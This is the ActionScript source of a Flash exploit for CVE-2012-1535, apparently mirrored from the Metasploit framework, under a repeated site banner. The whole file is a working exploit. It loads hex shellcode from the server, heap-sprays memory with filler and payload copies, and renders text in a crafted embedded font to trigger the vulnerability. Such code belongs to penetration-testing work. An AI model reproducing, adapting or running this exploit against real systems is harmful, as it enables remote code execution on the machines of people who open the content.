Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/external/source/exploits/CVE-2012-1535/Main.as
Views: 11777
package {
import flash.text.engine.*;
import flash.utils.*;
import flash.display.*;
import flash.events.*;
import flash.net.*;
import flash.external.*;
public class Main extends Sprite {
private var FontClass:Class;
public var kbArray:ByteArray;
public var mbArray:ByteArray;
public var tmpArray:ByteArray;
public var allocs:Array;
private var shellcode:String;
private var urlLoader:URLLoader = new URLLoader();
public function Main():void{
this.FontClass = Main_FontClass;
super();
var source:String = root.loaderInfo.parameters.s;
var path:String = "/" + source + ".txt"
var urlRequest:URLRequest = new URLRequest(path);
urlLoader.dataFormat = URLLoaderDataFormat.TEXT;
urlLoader.addEventListener(Event.COMPLETE, urlLoader_complete);
urlLoader.load(urlRequest);
}
public function finishExploit(p:String):void{
this.heapSpray(p);
this.TextBlock_createTextLineExample();
}
public function urlLoader_complete(evt:Event):void {
finishExploit(urlLoader.data);
}
public function TextBlock_createTextLineExample():void{
var _local1 = "Edit the world in hex.";
var _local2:FontDescription = new FontDescription("PSpop");
_local2.fontLookup = FontLookup.EMBEDDED_CFF;
var _local3:ElementFormat = new ElementFormat(_local2);
_local3.fontSize = 16;
var _local4:TextElement = new TextElement(_local1, _local3);
var _local5:TextBlock = new TextBlock();
_local5.content = _local4;
this.createLines(_local5);
}
private function createLines(_arg1:TextBlock):void{
var _local2:Number = 300;
var _local3:Number = 15;
var _local4:Number = 20;
var _local5:TextLine = _arg1.createTextLine(null, _local2);
while (_local5) {
_local5.x = _local3;
_local5.y = _local4;
_local4 = (_local4 + (_local5.height + 2));
addChild(_local5);
_local5 = _arg1.createTextLine(_local5, _local2);
};
}
public function heapSpray(p:String):void{
var _local1:uint;
_local1 = 0;
this.kbArray = new ByteArray();
this.kbArray.endian = Endian.LITTLE_ENDIAN;
var _local4:String = p;
var _local5:ByteArray = this.hexToBin(_local4);
var _local6:uint = (_local4.length / 2);
_local1 = 0;
while (_local1 < 0x0400) {
this.kbArray.writeByte(12);
_local1 = (_local1 + 1);
};
_local1 = 0;
this.mbArray = new ByteArray();
this.mbArray.endian = Endian.LITTLE_ENDIAN;
while (_local1 < 0x0400) {
this.mbArray.writeBytes(this.kbArray, 0, this.kbArray.length);
_local1 = (_local1 + 1);
};
_local1 = 0;
while (_local1 < 0x100000) {
this.mbArray.position = _local1;
this.mbArray.writeBytes(_local5, 0, _local5.length);
_local1 = (_local1 + 65536);
};
_local1 = 0;
this.allocs = new Array();
while (_local1 < 0x0200) {
this.tmpArray = new ByteArray();
this.tmpArray.endian = Endian.LITTLE_ENDIAN;
this.tmpArray.writeBytes(this.mbArray, 0, this.mbArray.length);
this.allocs.push(this.tmpArray);
_local1 = (_local1 + 1);
};
}
private function hexToBin(_arg1:String):ByteArray{
var _local5:String;
var _local2:ByteArray = new ByteArray();
var _local3:uint = _arg1.length;
var _local4:uint;
_local2.endian = Endian.LITTLE_ENDIAN;
while (_local4 < _local3) {
_local5 = (_arg1.charAt(_local4) + _arg1.charAt((_local4 + 1)));
_local2.writeByte(parseInt(_local5, 16));
_local4 = (_local4 + 2);
};
return (_local2);
}
}
}